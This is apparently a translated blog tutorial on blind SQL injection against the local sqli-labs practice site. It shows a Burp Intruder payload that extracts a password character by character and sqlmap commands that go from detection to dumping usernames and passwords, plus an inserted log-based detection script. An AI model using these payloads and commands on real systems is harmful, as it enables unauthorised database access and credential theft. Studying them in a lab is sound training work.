[Running blind SQL injection with tools]
2022-07-03 04:38:00 【Black zone (rise)】
Contents
1. (Tool) Running blind injection with Burp
1.2 Method 2: Brute-forcing with an injection statement
2. (Tool) Running Boolean blind injection with sqlmap
Step 1: Detect whether injection exists
Step 2: Enumerate database names
Step 3: Enumerate table names
1. (Tool) Running blind injection with Burp
1.1 Method 1: Brute force
After capturing the request, send it to the "Intruder" module.
Set up 2 payloads.
1.2 Method 2: Brute-forcing with an injection statement
Construct the injection statement and iterate over it:
(select case when '§0§' = lower(substring((select password from employees where empid=1),§1§,1)) then 1 else 0 end)
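From the defender's side, the iterated statement above leaves a recognizable trace in web logs: many requests from one client, each comparing a single character at a changing offset. The detection sketch below is an added example, not part of the original post; the log format, sample lines, thresholds and function names are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (client, request line, status); not from the page.
_P = ("/Less-5/?id=(select+case+when+%27{c}%27=lower(substring((select+password"
      "+from+employees+where+empid=1)%2C{n}%2C1))+then+1+else+0+end)")
SAMPLE_LOG = (
    ['192.0.2.10 "GET /Less-5/?id=1 HTTP/1.1" 200',
     '192.0.2.10 "GET /search?q=substring+function+docs HTTP/1.1" 200']
    + ['198.51.100.7 "GET ' + _P.format(c=c, n=n) + ' HTTP/1.1" 200'
       for n in (1, 2, 3) for c in "ab"]
)

LINE_RE = re.compile(r'^(\S+) "(?:GET|POST) (\S+) HTTP/[\d.]+"')
# A substring/substr/mid call that reads exactly one character at a numeric offset.
CHAR_PROBE_RE = re.compile(
    r"\b(?:substring|substr|mid)\s*\(.*?,\s*(\d+)\s*,\s*1\s*\)", re.I | re.S)


def find_char_probes(lines, min_requests=4, min_positions=2):
    """Return {client: {"requests": n, "positions": [...]}} for clients whose
    requests repeatedly compare single characters at several offsets."""
    seen = defaultdict(lambda: {"requests": 0, "positions": set()})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        # Decode twice to catch double-encoded payloads; '+' becomes a space.
        decoded = unquote_plus(unquote_plus(target))
        probe = CHAR_PROBE_RE.search(decoded)
        if probe:
            seen[client]["requests"] += 1
            seen[client]["positions"].add(int(probe.group(1)))
    return {
        c: {"requests": v["requests"], "positions": sorted(v["positions"])}
        for c, v in seen.items()
        if v["requests"] >= min_requests and len(v["positions"]) >= min_positions
    }


if __name__ == "__main__":
    for client, hit in find_char_probes(SAMPLE_LOG).items():
        print(client, hit)
```

The thresholds are deliberately low for the six constructed probe lines; on real traffic they would be tuned per time window.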
2. (Tool) Running Boolean blind injection with sqlmap
2.1 Commands:
-u Specify the injection point
--dbs Enumerate database names
--tables Enumerate table names
--columns Enumerate column names
--dump Dump the data
Once the corresponding result has been enumerated, add in turn -D to specify the database, -T to specify the table, and -C to specify the columns.
2.2 Usage process:
Step 1: Detect whether injection exists
Basic usage
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --batch
--batch uses the default settings.
In fact, the scan has already identified the environment,
so you can now add --dbms mysql.
Step 2: Enumerate database names
Command:
# Get all databases
sqlmap.py -u url --dbs --batch
---------
# Get the current database
sqlmap.py -u url --current-db --batch
Basic usage
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --dbs --batch
Step 3: Enumerate table names
Command:
python sqlmap.py -u url -D DB --tables --batch
Basic usage
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security --tables --batch
Step 4: Enumerate column names
Command:
sqlmap.py -u url -D DB -T TBL --columns --batch
Basic usage
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users --columns --batch
Step 5: Dump the data
Command:
sqlmap.py -u url -D DB -T TBL -C "COL1,COL2" --dump --batch
Basic usage
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users -C "username,password" --dump --batch
3. Recommended reading
[SQL injection - no echo] Boolean blind injection: principle, functions, usage process
[SQL injection - with echo] DNS request injection: principle, platform, usage process, configuration